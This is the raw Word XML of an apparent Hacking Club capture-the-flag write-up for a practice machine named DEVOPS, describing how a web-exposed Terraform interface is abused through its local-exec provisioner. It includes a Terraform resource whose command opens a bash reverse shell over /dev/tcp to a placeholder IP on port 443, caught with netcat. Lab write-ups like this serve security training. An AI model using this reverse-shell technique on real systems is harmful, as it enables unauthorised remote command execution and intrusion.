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pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.md5x29xlq8di" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:br w:type="page"/>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w1hcz8xjrvf5" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">About Hacking Club</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000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Hacking Club is a platform to learn cybersecurity, an incredible resource if you don’t know where to start. In addition to vulnerable machines, you have access to classes and challenges to practice your skills and access to an exclusive community to play and challenge yourself.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.6gjyyfwyiu02" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The best part about </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hacking Club</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is that it is very hands-on. If you are new to hacking, give it a try.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000007">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.le3alcaxdf4o" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000008">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This write-up refers to the </w:t>
      </w:r>
      <w:hyperlink r:id="rId7">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">DEVOPS</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> machine.If you require support, please open a ticket in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId8">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">support channel on the Discord server</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w: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potzekvwx6cu" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nmap Scan:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000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need to know which services are running in the background and which ports are open. So, we will use a tool called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap</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0B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="280" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.9fezgsndsavt" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3073400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="56" name="image18.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image18.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="59436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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="24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Port 80 – HTTP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000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only have one open port. Let’s take a look at the website.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="46"/>
          <w:szCs w:val="46"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3314700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="66"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pacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Terraform</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is an open-source Infrastructure as Code (IaC) software tool that provides a consistent CLI workflow to manage hundreds of cloud services. Terraform codifies cloud APIs into declarative configuration files.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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The </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">main.tf</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file is the main file that contains the provider configuration and creates all resources.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000011">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId11">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.terraform.io/docs/language/resources/provisioners/local-exec.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000012">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The local-exec provisioner invokes a local executable after a resource is created. This invokes a process on the machine running Terraform, not on the resource itself. See the remote-exec provisioner to run commands on the resource.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000013">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="24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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">command</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – (Required) The command to execute. It can be provided as a relative path to the current working directory or as an absolute path. It is evaluated in a shell and can use environment variables or Terraform variables.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000014">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">interpreter</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – (Optional) If provided, this is a list of interpreter arguments used to execute the command. The first argument is the interpreter itself. It can be provided as a relative or absolute path. The remaining arguments are prepended before the command. This allows building command lines in the format </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"/bin/bash", "-c", "echo 'foo'"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. If not specified, sensible defaults are chosen based on the operating system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000015">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resource "null_resource" "example1" {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000016">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provisioner "local-exec" {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000017">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command     = "ls -l /"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018">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interpreter = ["/bin/bash", "-c"]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000019">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01A">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01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will edit </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">main.tf</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and add our code.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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4343400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="47"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5943600" cy="43434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tl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Save changes → Plan &amp; Apply.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001E">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4178300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="62" name="image19.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image19.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="41783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pStyle w:val="Heading2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="80" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.tdv70d1ps2gl" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3987800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="59"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59436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successfully executed commands on the host. The next step is to obtain a reverse shell on the host.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000021">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resource "null_resource" "vert16x" {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022">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provisioner "local-exec" {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000023">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command     = "sh -i &gt;&amp; /dev/tcp/&lt;IP&gt;/443 0&gt;&amp;1"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000024">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interpreter = ["/bin/bash", "-c"]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000025">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026">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02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4267200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="53" name="image22.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image22.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600"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tl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Save changes → Plan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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Open Netcat to listen on a port to receive our reverse connection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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120900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="60" name="image20.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image20.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="59436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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Apply</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002C">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4305300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="57"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5943600"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And we have a shell 😀</w:t>
      </w:r>
    </w:p>
